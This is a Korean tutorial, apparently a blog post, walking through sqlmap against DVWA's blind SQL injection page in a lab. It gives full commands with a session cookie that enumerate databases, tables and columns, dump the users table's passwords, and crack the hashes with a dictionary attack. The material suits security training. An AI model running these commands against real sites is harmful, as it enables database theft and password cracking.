취약점 진단 (11) 에서 발견한 sql injection 취약점을 이용해서


Kali의 sqlmap을 사용해보자



(취약점 있는 사이트 주소)


(sql injection (blind) 메뉴에서 submit을 한번 이라도 눌러야지 id= 이라는 url이 추가 된다)


그리고 DVWA를 이용하기 위해 admin / password 로 로그인 했기 때문에


로그인 없이 접근을 못한다


그렇기 때문에 sqlmap을 사용할때 쿠키값을 같이 써줘야한다



나는 chrome의 앱중 Edit ThisCooke라는 것을 사용하지만


쿠키값을 볼 수 있는 방법은 여러가지다



Kali로 와서



sqlmap -h 와 sqlmap -hh (자세한 도움말)를 입력해서 도움말을 볼수 있다


sqlmap -u "http://192.168.0.11/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" -p "id" --dbs --cookie="security=low; PHPSESSID=532241126619564c18e1b1c628e09aa9"


이런식으로 자신의 쿠키값을 넣어주자


-p "id"는 취약점이 있는 변수 값을 써주면 되는데 생략해도 된다


--dbs 옵션으로 db리스트를 볼수 있을 것이다



사용하고 있는 운영체제(OS)와 PHP버전 Apache 버전


데이타베이스 정보까지 볼수 있었고


available databases [7]:


[*] dvwa

[*] information_schema


등등 여러개의 데이타베이스를 찾은것을 볼수 있다


어떤 데이타베이스가 있는지 알아냈으니 이제


sqlmap -u "http://192.168.0.11/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" -p "id" --dbs --cookie="security=low; PHPSESSID=532241126619564c18e1b1c628e09aa9" --tables -D "dvwa"


아까 명령어에서 --tables -D "데이타베이스명" 을 추가하여 보자



아까 결과에서 추가로 데이타베이스 dvwa의 tables를 볼수 있게 되었다


이젠 바로 전 명령어에서 추가로 --columns -T "테이블명" 을 추가해보자


sqlmap -u "http://192.168.0.11/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" -p "id" --dbs --cookie="security=low; PHPSESSID=532241126619564c18e1b1c628e09aa9" --tables -D "dvwa" --columns -T "users"



테이블 정보에서 이제 칼럼들의 정보를 볼수 있었다


이제 마지막으로 


-C 옵션과 --dump 옵션을 추가하자


sqlmap -u "http://192.168.0.11/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" -p "id" --dbs --cookie="security=low; PHPSESSID=532241126619564c18e1b1c628e09aa9" --tables -D "dvwa" --columns -T "users" -C "users,password" --dump




dvwa 데이타베이스에 저장되어있는 users 테이블의 user정보와 password 정보를 볼수 있었고


password가 암호화되어있는지만


do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

-> 디폴트 값으로 N (엔터)

do you want to crack them via a dictionary-based attack? [Y/n/q]

(사전 기반 공격으로 크랙할꺼냐)

-> 디폴트 값으로 Y (엔터)

what dictionary do you want to use?

(사전 뭘쓸껀지)

[1]

[2]

[3]

-> 디폴트 값으로 1 (엔터)

do you want to use common password suffixes? (slow!) [y/N]

(접미사 쓸꺼냐)

-> 디폴트 값으로 N (엔터)


사전에 기록되어있는 password는 크랙되어


암호화되기전 패스워드를 알아낼 수 있다


--dump 옵션으로 


/usr/share/sqlmap/output/192.168.0.11(주소)/dump/dvwa/users.csv 에가면 방금


얻은 user,password의 정보가 담겨져있고



/usr/share/sqlmap/output/192.168.0.11(주소)/log에는


지금까지 해온 모든 결과가 기록 되어있다